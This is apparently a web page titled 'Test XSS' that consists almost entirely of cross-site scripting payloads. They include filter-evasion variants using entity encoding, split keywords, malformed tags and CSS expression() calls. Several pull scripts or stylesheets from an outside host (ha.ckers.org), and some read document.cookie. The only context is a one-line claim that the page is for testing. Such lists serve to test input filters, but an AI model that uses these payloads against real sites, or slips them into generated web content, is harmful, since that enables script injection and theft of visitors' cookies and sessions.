Test XSS

The content is used for testing XSS.

 

<![CDATA[<]]>script<![CDATA[>]]>alert('xss')<![CDATA[<]]>/script<![CDATA[>]]>

 

/x3CSC RIPT%3Ealert(%22Cookie%22+document.cookie)/x3C/SC RIPT%3E

 

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

 

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

 

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

 

<IMG SRC="jav ascript:alert('XSS');">

 

<IMG SRC="jav&#x09;ascript:alert('XSS');">

 

 

<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>

 

perl -e 'print "<SCR/0IPT>alert(/"XSS/")</SCR/0IPT>";' > out

 

 

<IMG SRC=" &#14;  javascript:alert('XSS');">

 

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 

<<SCRIPT>alert("XSS");//<</SCRIPT>

 

<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

 

<SCRIPT SRC=//ha.ckers.org/.j>

 

<IMG SRC="javascript:alert('XSS')"

 

<SCRIPT>alert(/XSS/.source)</SCRIPT>

 

/";alert('XSS');//

 

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

 

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

 

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

 

žscriptualert(EXSSE)ž/scriptu

 

 

xss:expression(document.write(document.cookie))

<IMG SRC=javascript:alert('XSS')>

 

 

 

<SCRIPT>a=/XSS/

alert(a.source)</SCRIPT>

 

<TABLE BACKGROUND="javascript:alert('XSS')">

<anything STYLE="anything:expr/**/ession(alert(1))" />